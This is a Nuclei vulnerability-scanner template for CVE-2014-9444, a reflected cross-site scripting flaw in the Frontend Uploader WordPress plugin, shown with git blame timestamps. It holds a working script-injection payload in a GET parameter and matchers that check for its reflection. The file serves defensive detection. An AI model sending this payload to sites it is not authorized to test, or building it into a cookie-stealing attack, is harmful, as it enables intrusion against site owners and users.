nuclei-templates/http/cves/2014/CVE-2014-9444.yaml

49 lines
1.6 KiB
YAML
Raw Normal View History

2021-09-13 22:33:49 +00:00
id: CVE-2014-9444
info:
name: Frontend Uploader <= 0.9.2 - Cross-Site Scripting
2021-09-13 22:33:49 +00:00
author: daffainfo
severity: medium
description: The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability.
2023-09-06 13:22:34 +00:00
remediation: |
Update to the latest version of the Frontend Uploader plugin (0.9.2) or apply the vendor-supplied patch to fix the vulnerability.
2021-09-14 09:38:51 +00:00
reference:
2021-09-13 22:33:49 +00:00
- https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7
- https://nvd.nist.gov/vuln/detail/CVE-2014-9444
- http://packetstormsecurity.com/files/129749/WordPress-Frontend-Uploader-0.9.2-Cross-Site-Scripting.html
classification:
2022-09-06 01:33:31 +00:00
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
2023-07-11 19:49:27 +00:00
cvss-score: 4.3
cve-id: CVE-2014-9444
2023-07-11 19:49:27 +00:00
cwe-id: CWE-79
epss-score: 0.00287
epss-percentile: 0.6522
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:a:frontend_uploader_project:frontend_uploader:0.9.2:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: frontend_uploader_project
product: frontend_uploader
2023-09-06 13:22:34 +00:00
framework: wordpress
2023-07-11 19:49:27 +00:00
tags: wp-plugin,xss,wpscan,packetstorm,cve,cve2014,wordpress,unauth
2021-09-13 22:33:49 +00:00
http:
2021-09-13 22:33:49 +00:00
- method: GET
path:
2021-09-14 09:38:51 +00:00
- "{{BaseURL}}/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2021-09-13 22:33:49 +00:00
matchers-condition: and
matchers:
- type: word
2023-07-11 19:49:27 +00:00
part: body
2021-09-13 22:33:49 +00:00
words:
2021-09-14 09:38:51 +00:00
- '</script><script>alert(document.domain)</script>'
2021-09-13 22:33:49 +00:00
- type: word
part: header
words:
- text/html
- type: status
status:
- 200